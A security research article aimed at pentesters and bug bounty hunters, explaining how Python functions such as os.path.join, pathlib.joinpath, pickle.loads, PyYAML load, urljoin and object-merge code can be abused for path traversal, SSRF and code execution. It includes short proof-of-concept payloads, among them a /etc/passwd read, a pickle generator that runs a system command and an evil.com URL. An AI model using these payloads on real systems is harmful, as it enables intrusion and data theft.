Python pitfalls: Turning dev mistakes into vulnerabilities

Writeup by Alex Brumen aka Brumens, researcher enablement analyst, YesWeHack

In this article, you will discover and learn how to exploit common Python pitfalls that arise from subtle but dangerous behaviours in standard functions. These include path manipulation issues in os.path.join, URL handling quirks in urljoin, and class pollution problems in Python object handling.

I provide step-by-step guidance, supported by practical examples, on crafting payloads tailored to each function. These examples demonstrate how seemingly safe logic can be abused to achieve path traversal (CWE-22) and, in some cases, escalated into remote code execution (RCE).

Developers often assume that built-in functions automatically perform sanitisation or enforce safe behaviour. In reality, many of these functions contain edge-case behaviours that attackers can abuse to transform logic issues into exploitable vulnerabilities. For example, YAML deserialisation is commonly expected to simply parse structured data. However, when using PyYAML, the most widely adopted YAML library in Python, unsafe loaders can execute arbitrary Python code based on attacker-controlled input.

Whether you’re a pentester, security researcher or Bug Bounty hunter, this guide offers actionable advice on attacking commonly used functions in Python to exploit security vulnerabilities.

You can also explore these methods by watching my presentation of this research during the NahamCon 2025 Winter Edition and put them into practice by tackling my ‘Python Pitfalls’ training modules on Dojo.

How do Python security pitfalls arise in development

Python vulnerabilities often arise when developers use functions or libraries without reading the relevant documentation, instead making assumptions about a function’s behaviour based on its name or brief description.

Most functions include an explanation of their intended purpose in the official documentation or docstrings, often accompanied by warnings of when a known behaviour could be dangerous. However, many functions exhibit subtle or unexpected behaviours that are easy to miss. These details are frequently buried within the documentation or only become apparent when reading more deeply into the function’s exact behaviour.

As an example, the function os.path.join has an unexpected behaviour: it truncates the path if one part of the path starts with a forward slash.

Example code:

1import os
2# Payload is an absolute path, starts with "/"
3payload = "/etc/passwd"
4
5file = os.path.join("/user/uploads/", payload)
6
7with open(file, "r") as f:
8   print(f.read()) # output the content of the file: "/etc/passwd"

Although this unexpected behaviour is mentioned inline within the documentation, it is easily overlooked. If you use this function together with unsanitised user input, you're vulnerable to path traversal. This can result in an attacker being able to perform file overwrites, read system files or achieve code injection.

os.path.join guidance from the official Python3 documentation

Goal of this research

The research objective was to identify Python functions that are frequently found in production applications, before crafting payloads that weaponize the aforementioned ‘Python pitfalls’.

As with most of my research, this project started with me trawling through documentation. This time, the focus was on Python’s os.path.join function, as mentioned earlier. I’ve known for years about how this function discards earlier path segments if a later component is an absolute path, and I’ve always been fascinated by unexpected behaviours that are intentionally built into functions. These edge cases are goldmines for hackers.

Finally, I’ve got round to digging deeper into Python as a programming language, and exploring how these design choices translate into practical pitfalls and how they can be abused in real-world attack scenarios.

MORE RESEARCH BY THIS AUTHOR The minefield between syntaxes: exploiting syntax confusions in the wild

Black-box testing for Python bugs

Black-box testing is a foundational skill for bug hunters and pentesters. It’s the art of understanding application behaviour by analysing how it responds to different inputs, without having access to the underlying source code.

Most real-world engagements involve attacking applications in a black-box environment. That’s why it’s essential to develop a strategy for fingerprinting the Python pitfalls we’re about to explore. Before doing so, you need to understand the core concepts of what to observe and extract from an application’s responses.

As an attacker, you should focus on the following key factors:

Time delays
Content
Errors
Reflected values
Process result
Verbose messages
Syntax

When these behaviours appear only after sending a weaponised payload but change or disappear when a benign payload is used, it’s a strong indication that you’re triggering input-dependent code logic. This behaviour may directly expose a vulnerability or reveal a hidden pitfall in the application’s logic that warrants further testing.

Detecting Python pitfall patterns

When identifying Python pitfalls, your focus should be on how user-controlled input is handled by specific functions or code patterns. Look for:

The function’s behaviour changing depending on the supplied input
The function performing normalisation that alters the original input
The function parsing or interpreting input instead of treating it as raw data

These patterns frequently introduce subtle logic flaws that can be escalated into exploitable vulnerabilities.

Commonly exploitable Python functions

During the research, I discovered six different Python pitfalls. Five originate from built-in libraries, and one comes from a widely used external library.

The affected functions are:

os.path.join (built-in)
pathlib.joinpath (built-in)
pickle.loads (built-in)
urllib.parse.urljoin (built-in)
PyYAML's load function (external library)
Python3 class pollution (built-in)

os.path.join & path traversal

Python’s os.path.join function joins one or more path segments and returns a single, concatenated path.

The main pitfall lies in how this behaviour is commonly misunderstood. Many developers assume that os.path.join sanitises or normalises all path components as part of the joining process. Based on this assumption, they might apply flawed logic, believing that inputs such as dot-dot-slash (../) sequences or absolute paths embedded in the middle of the path will be safely normalised or rejected.

In reality, os.path.join does not prevent path traversal or enforce path containment, and will happily discard earlier path segments if an absolute path appears later in the input. The documentation does mention this behaviour, but only inline and without strong warnings, making it easy to overlook during development.

The following code snippet demonstrates this pitfall:

1import os
2payload = "/etc/passwd"
3
4file = os.path.join("/user/uploads/", payload)
5
6with open(file, "r") as f:
7   print(f.read()) # print the “/etc/passwd” file content

Here’s a useful visualisation of the code workflow for os.path.join:

Risks exposed

The primary vulnerability exposed by this pitfall is path traversal, which can lead to several high-impact issues, including:

Arbitrary system file reads
File overwrite
Remote code execution (RCE)

These impacts depend on how the resulting path is used within the application and whether additional unsafe operations are performed on the resolved file path.

Real-world vulnerabilities: CVEs exploiting os.path.join pitfalls

Production applications continue to fall victim to developers’ ignorance of this os.path.join pitfall, as the following vulnerabilities demonstrate:

CVE-2025-57403 – path traversal to RCE

Unsanitised os.path.join input in Gerapy allowed arbitrary file writes, escalating to remote code execution through critical file overwrites.

CVE-2025-6278 – Absolute path truncation

Missing path validation in Upsonic allowed absolute paths (/etc/passwd) to truncate base directories, enabling arbitrary file reads.

PyPA issue #4946 – Path traversal leads to arbitrary file write

In Setuptools’ PackageIndex.download, path construction from archive contents without validation allowed malicious packages to extract files outside intended directories, affecting thousands of dependent projects.

Practical lab for os.path.join

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

TRY THE DOJO LAB

pathlib.joinpath & path traversal

The pathlib.joinpath method is very similar to os.path.join. Calling it is equivalent to appending each provided path segment in sequence.

Just like os.path.join, you might expect joinpath to sanitise input or enforce safe normalisation. But that is not the case. If any segment is an absolute path, it discards the earlier parts and continues from the absolute path. It also accepts dot-dot-slash sequences, which means user-controlled input can still lead to path traversal if you rely on it for safety.

Example code:

1from pathlib import Path
2payload = "/etc/passwd"
3
4file = Path("/var/www/html").joinpath("files", payload)
5
6with open(file, "r") as f:
7   print(f.read()) # print the “/etc/passwd” file content

Here’s a useful visualisation of the code workflow for pathlib.joinpath:

Risks exposed

The similarities with os.path.join mean the pitfalls I found in pathlib.joinpath also lead to path traversal vulnerabilities, with the same impacts:

Arbitrary system file reads
File overwrite
Remote code execution (RCE)

These impacts depend on how the resulting path is used within the application. If the output of pathlib.joinpath is passed directly to file operations such as read or write without additional validation, the application becomes vulnerable.

Practical lab for pathlib.joinpath

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

TRY THE DOJO LAB

pickle.loads & RCE

Python’s pickle module is well known for being dangerous when used with user-controlled input, especially the function pickle.loads. While this behaviour can be considered a pitfall, using this function with untrusted input introduces a direct vulnerability known as deserialization of untrusted data (CWE-502), which can result in arbitrary code execution and full RCE.

Example code:

1import pickle, base64
2payload = "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
3
4# Execute code during unserialization (system command: ”id”)
5file = pickle.loads(base64.b64decode(payload))

To trigger a Python code injection, we could use a script like this:

1import os, base64, pickle
2
3class RCE:
4    def __reduce__(self):
5        cmd = "id"
6        return os.system, (cmd,)
7
8pickled = pickle.dumps(RCE())
9print( "Payload:", base64.urlsafe_b64encode(pickled).decode("utf-8") )

The code above creates a serialised object that, once deserialised, executes the system command id via the __reduce__ object method.

Example workflow when using pickle.loads:

Risks exposed

The pickle.loads pitfall exposes a vulnerability that can result in code injection and, consequently, RCE.

Real-world vulnerabilities: CVEs exploiting pickle.loads

Developers seeking an easy way to deserialize data can inadvertently create vulnerabilities through their use of pickle.loads. This trio of CVEs demonstrate the problem is a recent one:

CVE-2025-3108 – insecure deserialization to RCE in JsonPickleSerializer

JsonPickleSerializer prioritizes deserialization using pickle.loads(), which can execute arbitrary code when processing untrusted data.

CVE-2026-23946 – insecure deserialization to RCE in Helpdesk module

Remote code execution possible for an attacker authenticated with staff-level privileges.

CVE-2025-1716 – RCE via malicious pickle file bypassing static analysis in Picklescan

An unsafe deserialization vulnerability in Python’s pickle module allowed an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization.

Practical lab for pickle.loads

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

TRY THE DOJO LAB

PyYAML & insecure deserialisation

Moving beyond built-in modules, when developers handle YAML-based data they most often turn to PyYAML. This external library makes it easy to serialise and deserialise YAML data.

However, there is an important catch in the documentation. When deserialising YAML data, developers often rely on PyYAML’s load function. If a safe loader is not explicitly specified, the application may become vulnerable to insecure deserialisation (CWE-502), in a manner similar to pickle.loads.

Using an unsafe loader allows attacker-controlled YAML content to instantiate arbitrary Python objects, which can lead to code execution during deserialisation.

Example code:

1import yaml
2user_data = "!!python/object/apply:print ['pwned']"
3
4result = yaml.load(user_data, Loader=yaml.Loader)

In the code above, the user input !!python/object/apply:print ['pwned'] instructs PyYAML’s loader (yaml.Loader) to invoke a Python function during deserialisation, resulting in code: print('pwned') being executed by the application.

Example workflow when using yaml.load:

Risks exposed

Using yaml.load() with an unsafe loader introduces a code-execution vulnerability, potentially leading to RCE, similar to the risks associated with pickle.loads.

Real-world vulnerabilities: CVEs exploiting yaml.load

YAML is commonly used for configuration files, which often contain user-controllable data. Developers who use yaml.load without restricting the loader may unintentionally enable dangerous object deserialisation. This pitfall has been exposed by multiple CVEs:

CVE-2025-50460 – insecure YAML deserlization leading to RCE in ms-swift

An RCE in version 3.3.0 caused by unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1).

CVE-2026-24009 – PyYAML insecure deserialization leading to RCE in Docling Core

Vulnerability present in applications using PyYAML prior to version 5.4 and invoking docling_core.types.doc.DoclingDocument.load_from_yaml() with untrusted YAML data.

Practical lab for yaml.load

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

TRY THE DOJO LAB

Python3 & class pollution

Python can be vulnerable to class pollution. Unlike the other pitfalls covered here, this is not tied to a specific function but instead relates to how Python handles variables in memory and how they can be unexpectedly overwritten if improperly managed. Class pollution typically arises in code that merges objects insecurely.

Example code:

1some_var = "change me!"
2
3class Dummy:
4    def __init__(self):
5        pass
6
7def merge(source, destination):
8    for key, value in source.items():
9        if hasattr(destination, "get"):
10            if destination.get(key) and type(value) == dict:
11                merge(value, destination.get(key))
12            else:
13                destination[key] = value
14        elif hasattr(destination, key) and type(value) == dict:
15            merge(value, getattr(destination, key))
16        else:
17            setattr(destination, key, value)
18
19some_class = Dummy()
20
21payload = {
22    "__init__": {
23        "__globals__": {
24            "some_var": "polluted"
25        }
26    }
27}
28
29merge(payload, some_class)
30
31print(some_var) # Output: polluted

Example workflow when using for Python class pollution:

Risks exposed

Because this pitfall affects how objects and classes are merged or modified at runtime, Python class pollution primarily introduces risks related to unintended attribute or variable overwrites in memory, which can directly impact application logic.

The following CWEs may be exposed when an application is vulnerable to Python class pollution:

CWE-454: External initialization of trusted variables or data stores
CWE-269: improper privilege management
CWE-94: improper control of generation of code (‘code injection’)

Class pollution impact heavily depends on what data can be affected within the application, meaning a variety of security vulnerabilities may be exposed as a result.

Real-world vulnerabilities: CVEs exploiting Python class pollution

Class pollution vulnerabilities are relatively rare, but when developers do fall victim to this pitfall it often leads to severe security issues, as the following CVE demonstrates:

CVE-2025-58367 – class pollution via Delta class constructor in DeepDiff

An available gadget allowed deepdiff.serialization.SAFE_TO_IMPORT to be modified to permit dangerous classes such as posix.system, enabling insecure Pickle deserialisation via the Delta class and potentially allowing arbitrary Python code execution.

Practical lab for pitfalls using Python class pollution

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

Python urllib.parse.urljoin

Python’s urllib.parse.urljoin function constructs a final URL by combining a base URL with one or more URL components.

What makes this behaviour surprising is that, unlike os.path.join and pathlib.joinpath – which truncate earlier path segments when an absolute path is encountered – urllib.parse.urljoin discards the entire base URL when an absolute URL is provided as input, ignoring everything that came before it.

Example code:

1from urllib.parse import urljoin
2
3payload = "http://evil.com/"
4print(urljoin("http://example.com/", payload))  # output: http://evil.com/

Example workflow when using for Python urljoin:

Risks exposed

This behaviour is easy to overlook and can introduce serious security issues when user input is involved. Developers often assume that urljoin always appends paths safely, but this truncation logic can be abused to redirect requests, bypass allow-lists or trigger other unintended behaviours.

The following vulnerabilities may be introduced:

CWE-918: server-side request forgery (SSRF)
CWE-22: path traversal
CWE-235: improper handling of extra parameters
CWE-601: URL redirection to untrusted site (‘open redirect’)

Real-world vulnerabilities: CVEs exploiting Python urljoin

Developers tend to use urljoin when building URLs for redirects or performing internal requests. Without proper sanisation of user-controllable input, this can expose serious vulnerabilities. Here are some real-world examples:

CVE-2024-42353 – vulnerability in WebOb’s HTTP location header normalization process

When normalising the HTTP Location header, WebOb parsed the redirect URL using urlparse and joined it to the base URL. A URL beginning with // was treated by urlparse as a scheme-less URI, causing the following segment to be interpreted as a hostname, which urljoin then used to replace the original.

CVE-2025-68696 – SSRF in httparty

Issue posed a risk of leaking API keys, and could allow third parties to issue requests to internal servers.

Practical lab for urljoin

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

TRY THE DOJO LAB

Mitigation best practices for Python pitfalls: improve your code logic

A code pitfall is not a vulnerability by itself. The only reliable way to avoid falling into these traps is to read and adhere to the documentation for the functions you use, especially when they process user-controlled input. It’s essential to understand the function’s logic, internal workflow and how its behaviour changes based on the input it receives.

With this understanding, developers can use or implement appropriate sanitisation mechanisms to prevent these pitfalls from turning into real vulnerabilities.

Python pitfalls research roadmap

Python pitfalls, along with similar issues across other programming languages and frameworks, will always exist, and many have yet to be discovered. Problematic code logic and unexpected behaviours triggered by user-controlled input continue to arise, giving attackers the opportunity to achieve unintended and sometimes severe impact.

Less-documented or misunderstood behaviours in functions that process user input represent valuable targets for security researchers and bug bounty hunters, as they often expose novel and unconventional exploitation paths. As programming languages evolve and frameworks are updated, new variants of these pitfalls continue to emerge in modern applications – making continuous research and testing essential for staying ahead of the threat landscape.

References and further reading

MORE RESEARCH BY THIS AUTHOR The minefield between syntaxes: exploiting syntax confusions in the wild

Python pitfalls: Turning developer mistakes into vulnerabilities

How do Python security pitfalls arise in development

Goal of this research

Black-box testing for Python bugs

Detecting Python pitfall patterns

Commonly exploitable Python functions

os.path.join & path traversal

Risks exposed

Real-world vulnerabilities: CVEs exploiting os.path.join pitfalls

CVE-2025-57403 – path traversal to RCE

CVE-2025-6278 – Absolute path truncation

PyPA issue #4946 – Path traversal leads to arbitrary file write

Practical lab for os.path.join

pathlib.joinpath & path traversal

Risks exposed

Practical lab for pathlib.joinpath

pickle.loads & RCE

Risks exposed

Real-world vulnerabilities: CVEs exploiting pickle.loads

CVE-2025-3108 – insecure deserialization to RCE in JsonPickleSerializer

CVE-2026-23946 – insecure deserialization to RCE in Helpdesk module

CVE-2025-1716 – RCE via malicious pickle file bypassing static analysis in Picklescan

Practical lab for pickle.loads

PyYAML & insecure deserialisation

Risks exposed

Real-world vulnerabilities: CVEs exploiting yaml.load

CVE-2025-50460 – insecure YAML deserlization leading to RCE in ms-swift

CVE-2026-24009 – PyYAML insecure deserialization leading to RCE in Docling Core

Practical lab for yaml.load

Python3 & class pollution

Risks exposed

Real-world vulnerabilities: CVEs exploiting Python class pollution

CVE-2025-58367 – class pollution via Delta class constructor in DeepDiff

Practical lab for pitfalls using Python class pollution

Python urllib.parse.urljoin

Risks exposed

Real-world vulnerabilities: CVEs exploiting Python urljoin

CVE-2024-42353 – vulnerability in WebOb’s HTTP location header normalization process

CVE-2025-68696 – SSRF in httparty

Practical lab for urljoin

Mitigation best practices for Python pitfalls: improve your code logic

Python pitfalls research roadmap

References and further reading